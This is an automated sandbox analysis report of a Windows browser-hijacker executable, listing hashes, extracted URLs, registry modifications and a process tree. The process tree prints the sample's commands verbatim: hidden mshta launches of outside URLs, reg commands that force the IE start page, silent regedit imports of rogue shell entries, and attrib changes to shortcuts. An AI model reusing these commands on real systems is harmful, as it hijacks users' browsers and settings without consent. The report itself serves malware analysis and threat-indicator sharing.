Analysis
-
max time kernel
138s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
02-01-2024 15:38
Static task
static1
Behavioral task
behavioral1
Sample
7e68b17d4fa5b2e59f1b6309a6581519.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
7e68b17d4fa5b2e59f1b6309a6581519.exe
Resource
win10v2004-20231215-en
General
-
Target
7e68b17d4fa5b2e59f1b6309a6581519.exe
-
Size
44KB
-
MD5
7e68b17d4fa5b2e59f1b6309a6581519
-
SHA1
5d66be6c523ef8eda99d09b0989c8d31732debb9
-
SHA256
c2573e2c825fcf6c63ccf3db067dce07000c4fdfa507f93365701377b755ad9c
-
SHA512
d2a125aacc5476fb80bc4c0d189aec5ccadc30c61a39b2a7082c0f786a2de932efd8dc11f394433037043e48c147111e11d5b2f7862c4aeac14217cb0a724a4d
-
SSDEEP
384:GjiXAA8k9OgEZ6Q/SD/Vc28bkBp1NlEcFh19hJlS5J0f6VA72Y9FSPlHBPXxtpJZ:V9OggI/VEYNlnUXxth
Malware Config
Extracted
http://adminlzcheng.6600.org/img/tc.htm?34",0)(window.close)
Extracted
http://www.27dh.com/?34tc",0)(window.close)
Signatures
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\regsets.ini cmd.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\WINDOWS\46.bat 7e68b17d4fa5b2e59f1b6309a6581519.exe File opened for modification C:\WINDOWS\46.vbs 7e68b17d4fa5b2e59f1b6309a6581519.exe File created C:\Windows\help\rllfdDSDfds7.vbs cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 4756 tasklist.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 4140 ipconfig.exe -
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000005d05a5489e56c74eaa6b39ab0831a11f00000000020000000000106600000001000020000000af5af1f0b27b8839d857615432c5a532adc30280b1cee659d86458a60cce8ca4000000000e80000000020000200000007b295c314e83a5f132ddbd812a39b25e0bc214954e659d011e0e3c7fc23b439b2000000040c584a6e0138b3d628839c8cd2020035d47fa491899415a0a57c7db9507249640000000b49e517794d58acf00e775fa1b8e62fbc17e3fa9eb3bb096a96068efdfecb266e71e4565f551a3d540a797cbcc476c44f8cca599d87292d5bd054a692470bafc iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000005d05a5489e56c74eaa6b39ab0831a11f00000000020000000000106600000001000020000000acfd63db53bdb7453886d543dfd00ee291e7d752659732a0a4e2121eeff19fdb000000000e8000000002000020000000be3cf9a66cd55edf1f1398be005621dcf3dbd9cc9b015af935a506d3f8ff5aa320000000f0a5e9fec4d8eae7225c377538aa420821032615132aee32e0e3d2586ae328a8400000008999f66c423331e82a5cafd6888d8da0d8f668493757ffb25b5d765744bf1c11ceea9da0a9ba3f58ac4fb1b843739a4b609960f1896ff9f019642a9e0a03593e iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000005d05a5489e56c74eaa6b39ab0831a11f000000000200000000001066000000010000200000005b18a6d192440e4ae4dcf2be885e3fe60417a6bbe7e088abea23dc7e56fe759b000000000e8000000002000020000000378a05a48fb5bbd543d61fc4ab84295104d45d939b3593ae300cbb3e884b03c520000000da1bf3ad04dd59fda45f4dc6b9e12f4e96142fdd725c0791ac985b852bb511af4000000058afe799583715fa15c16dcadd0106cfffdfc3f3a112ae74ff2df624fe21693e7eb81978e11a98e0e534f2a5fc03d676dde8afa7efe9a27dd1ecaa785c3510ac iexplore.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{F6E7F1FC-A984-11EE-8184-CA152A8DAB80} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31079825" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "410974878" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\Main regini.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3420646878" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3420646878" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3420646878" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31079825" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31079825" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 50a45ace913dda01 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 405f5fce913dda01 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 003cadcf913dda01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\Main reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31079825" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3420646878" iexplore.exe -
Modifies Internet Explorer start page 1 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "http://www.27dh.com/?10034/" reg.exe -
Modifies registry class 24 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{86AEFBE8-763F-0688-899C-A93138888899} regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{86AEFBE8-763F-0688-899C-A93138888899}\DefaultIcon regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{86AEFBE8-763F-0688-899C-A93138888899}\Shell regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{86AEFBE8-763F-0688-899C-A93138888899}\Shell\D\ = "ɾ³ý(&D)" regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{86AEFBE8-763F-0688-899C-A93138888899}\Shell\D\Command regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{86AEFBE8-763F-0688-899C-A93138888899}\Shell\ÊôÐÔ\Command regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{86AEFBE8-763F-0688-899C-A93138888899}\Shell\D\Command\ = "Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{86AEFBE8-763F-0688-899C-A93138888899}\ShellFolder\Attributes = "10" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{86AEFBE8-763F-0688-899C-A93138888899}\ShellFolder\ regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{86AEFBE8-763F-0688-899C-A93138888899}\DefaultIcon\ = "C:\\Program Files\\Internet Explorer\\iexplore.exe" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{86AEFBE8-763F-0688-899C-A93138888899}\Shell\ regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{86AEFBE8-763F-0688-899C-A93138888899}\Shell\Open regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{86AEFBE8-763F-0688-899C-A93138888899}\Shell\Open\ = "´ò¿ªÖ÷Ò³" regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{86AEFBE8-763F-0688-899C-A93138888899}\Shell\ÊôÐÔ regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{86AEFBE8-763F-0688-899C-A93138888899}\Shell\ÊôÐÔ\ = "ÊôÐÔ" regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{86AEFBE8-763F-0688-899C-A93138888899}\ShellFolder regedit.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{86AEFBE8-763F-0688-899C-A93138888899}\ = "Internet Explorer" regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{86AEFBE8-763F-0688-899C-A93138888899}\Shell\D regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{86AEFBE8-763F-0688-899C-A93138888899}\Shell\Open\Command regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{86AEFBE8-763F-0688-899C-A93138888899}\Shell\Open\Command\ = "C:\\Program Files\\Internet Explorer\\iexplore.exe http://www.27dh.com/?10034/" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{86AEFBE8-763F-0688-899C-A93138888899}\Shell\ÊôÐÔ\Command\ = "Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl" regedit.exe -
Runs regedit.exe 2 IoCs
pid Process 316 regedit.exe 4692 regedit.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 2728 7e68b17d4fa5b2e59f1b6309a6581519.exe 2728 7e68b17d4fa5b2e59f1b6309a6581519.exe 2728 7e68b17d4fa5b2e59f1b6309a6581519.exe 2728 7e68b17d4fa5b2e59f1b6309a6581519.exe 2728 7e68b17d4fa5b2e59f1b6309a6581519.exe 2728 7e68b17d4fa5b2e59f1b6309a6581519.exe 2728 7e68b17d4fa5b2e59f1b6309a6581519.exe 2728 7e68b17d4fa5b2e59f1b6309a6581519.exe 2728 7e68b17d4fa5b2e59f1b6309a6581519.exe 2728 7e68b17d4fa5b2e59f1b6309a6581519.exe 2728 7e68b17d4fa5b2e59f1b6309a6581519.exe 2728 7e68b17d4fa5b2e59f1b6309a6581519.exe 2728 7e68b17d4fa5b2e59f1b6309a6581519.exe 2728 7e68b17d4fa5b2e59f1b6309a6581519.exe 2728 7e68b17d4fa5b2e59f1b6309a6581519.exe 2728 7e68b17d4fa5b2e59f1b6309a6581519.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4756 tasklist.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1324 iexplore.exe 1324 iexplore.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
pid Process 2728 7e68b17d4fa5b2e59f1b6309a6581519.exe 1324 iexplore.exe 1324 iexplore.exe 3864 IEXPLORE.EXE 3864 IEXPLORE.EXE 1324 iexplore.exe 1324 iexplore.exe 1212 IEXPLORE.EXE 1212 IEXPLORE.EXE 1324 iexplore.exe 1324 iexplore.exe 1212 IEXPLORE.EXE 1212 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2728 wrote to memory of 1828 2728 7e68b17d4fa5b2e59f1b6309a6581519.exe 24 PID 2728 wrote to memory of 1828 2728 7e68b17d4fa5b2e59f1b6309a6581519.exe 24 PID 2728 wrote to memory of 1828 2728 7e68b17d4fa5b2e59f1b6309a6581519.exe 24 PID 2728 wrote to memory of 816 2728 7e68b17d4fa5b2e59f1b6309a6581519.exe 20 PID 2728 wrote to memory of 816 2728 7e68b17d4fa5b2e59f1b6309a6581519.exe 20 PID 2728 wrote to memory of 816 2728 7e68b17d4fa5b2e59f1b6309a6581519.exe 20 PID 1828 wrote to memory of 2824 1828 cmd.exe 18 PID 1828 wrote to memory of 2824 1828 cmd.exe 18 PID 1828 wrote to memory of 2824 1828 cmd.exe 18 PID 816 wrote to memory of 2408 816 cmd.exe 22 PID 816 wrote to memory of 2408 816 cmd.exe 22 PID 816 wrote to memory of 2408 816 cmd.exe 22 PID 2824 wrote to memory of 1324 2824 mshta.exe 23 PID 2824 wrote to memory of 1324 2824 mshta.exe 23 PID 1324 wrote to memory of 3864 1324 iexplore.exe 26 PID 1324 wrote to memory of 3864 1324 iexplore.exe 26 PID 1324 wrote to memory of 3864 1324 iexplore.exe 26 PID 1828 wrote to memory of 2548 1828 cmd.exe 28 PID 1828 wrote to memory of 2548 1828 cmd.exe 28 PID 1828 wrote to memory of 2548 1828 cmd.exe 28 PID 2548 wrote to memory of 4380 2548 mshta.exe 31 PID 2548 wrote to memory of 4380 2548 mshta.exe 31 PID 1324 wrote to memory of 1212 1324 iexplore.exe 32 PID 1324 wrote to memory of 1212 1324 iexplore.exe 32 PID 1324 wrote to memory of 1212 1324 iexplore.exe 32 PID 1828 wrote to memory of 316 1828 cmd.exe 35 PID 1828 wrote to memory of 316 1828 cmd.exe 35 PID 1828 wrote to memory of 316 1828 cmd.exe 35 PID 1828 wrote to memory of 1228 1828 cmd.exe 56 PID 1828 wrote to memory of 1228 1828 cmd.exe 56 PID 1828 wrote to memory of 1228 1828 cmd.exe 56 PID 1828 wrote to memory of 3936 1828 cmd.exe 55 PID 1828 wrote to memory of 3936 1828 cmd.exe 55 PID 1828 wrote to memory of 3936 1828 cmd.exe 55 PID 1828 wrote to memory of 400 1828 cmd.exe 54 PID 1828 wrote to memory of 400 1828 cmd.exe 54 PID 1828 wrote to memory of 400 1828 cmd.exe 54 PID 1828 wrote to memory of 4692 1828 cmd.exe 52 PID 1828 wrote to memory of 4692 1828 cmd.exe 52 PID 1828 wrote to memory of 4692 1828 cmd.exe 52 PID 1828 wrote to memory of 896 1828 cmd.exe 51 PID 1828 wrote to memory of 896 1828 cmd.exe 51 PID 1828 wrote to memory of 896 1828 cmd.exe 51 PID 1828 wrote to memory of 1576 1828 cmd.exe 50 PID 1828 wrote to memory of 1576 1828 cmd.exe 50 PID 1828 wrote to memory of 1576 1828 cmd.exe 50 PID 1828 wrote to memory of 932 1828 cmd.exe 49 PID 1828 wrote to memory of 932 1828 cmd.exe 49 PID 1828 wrote to memory of 932 1828 cmd.exe 49 PID 1828 wrote to memory of 3404 1828 cmd.exe 36 PID 1828 wrote to memory of 3404 1828 cmd.exe 36 PID 1828 wrote to memory of 3404 1828 cmd.exe 36 PID 1828 wrote to memory of 3100 1828 cmd.exe 125 PID 1828 wrote to memory of 3100 1828 cmd.exe 125 PID 1828 wrote to memory of 3100 1828 cmd.exe 125 PID 1828 wrote to memory of 4100 1828 cmd.exe 46 PID 1828 wrote to memory of 4100 1828 cmd.exe 46 PID 1828 wrote to memory of 4100 1828 cmd.exe 46 PID 1828 wrote to memory of 1232 1828 cmd.exe 37 PID 1828 wrote to memory of 1232 1828 cmd.exe 37 PID 1828 wrote to memory of 1232 1828 cmd.exe 37 PID 1828 wrote to memory of 1296 1828 cmd.exe 45 PID 1828 wrote to memory of 1296 1828 cmd.exe 45 PID 1828 wrote to memory of 1296 1828 cmd.exe 45 -
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 3100 attrib.exe 3404 attrib.exe 1232 attrib.exe 4100 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\7e68b17d4fa5b2e59f1b6309a6581519.exe"C:\Users\Admin\AppData\Local\Temp\7e68b17d4fa5b2e59f1b6309a6581519.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\WINDOWS\46.vbs"2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\WINDOWS\46.vbs"3⤵PID:2408
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\WINDOWS\46.bat2⤵
- Checks computer location settings
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Windows\SysWOW64\mshta.exemshta vbscript:CreateObject("WScript.Shell").Run("iexplore http://www.27dh.com/?34tc",0)(window.close)3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.27dh.com/?34tc4⤵
- Modifies Internet Explorer settings
PID:4380
-
-
-
C:\Windows\SysWOW64\regedit.exeRegedit /s add7.rig3⤵
- Modifies registry class
- Runs regedit.exe
PID:316
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r "C:\Users\Admin\í╕┐¬╩╝í╣▓╦╡Ñ\│╠╨≥\╞⌠╢»\*.lnk"3⤵
- Views/modifies file attributes
PID:3404
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*.lnk"3⤵
- Views/modifies file attributes
PID:1232
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /nh3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4756
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\help\rllfdDSDfds7.vbs"3⤵
- Checks computer location settings
PID:404
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /all|findstr /c:"Physical Address"3⤵PID:1296
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r "C:\Users\Admin\╫└├µ\*.lnk"3⤵
- Views/modifies file attributes
PID:4100
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r "C:\Users\Admin\í╕┐¬╩╝í╣▓╦╡Ñ\│╠╨≥\*.lnk"3⤵
- Views/modifies file attributes
PID:3100
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_CLASSES_ROOT\CLSID\{86AEFBE8-763F-0647-899C-A93138888899}" /f3⤵PID:932
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{86AEFBE8-763F-0647-899C-A93138888899}" /f3⤵PID:1576
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{86AEFBE8-763F-0647-899C-A93138888899}" /f3⤵PID:896
-
-
C:\Windows\SysWOW64\regedit.exeRegedit /s web.rig3⤵
- Modifies registry class
- Runs regedit.exe
PID:4692
-
-
C:\Windows\SysWOW64\regini.exeregini C:\Windows\system32\regsets.ini3⤵
- Modifies Internet Explorer settings
PID:400
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.27dh.com/?10034/" /f3⤵
- Modifies Internet Explorer settings
- Modifies Internet Explorer start page
PID:3936
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /f3⤵PID:1228
-
-
-
C:\Windows\SysWOW64\mshta.exemshta vbscript:CreateObject("WScript.Shell").Run("iexplore http://adminlzcheng.6600.org/img/tc.htm?34",0)(window.close)1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://adminlzcheng.6600.org/img/tc.htm?342⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1324 CREDAT:17410 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3864
-
-
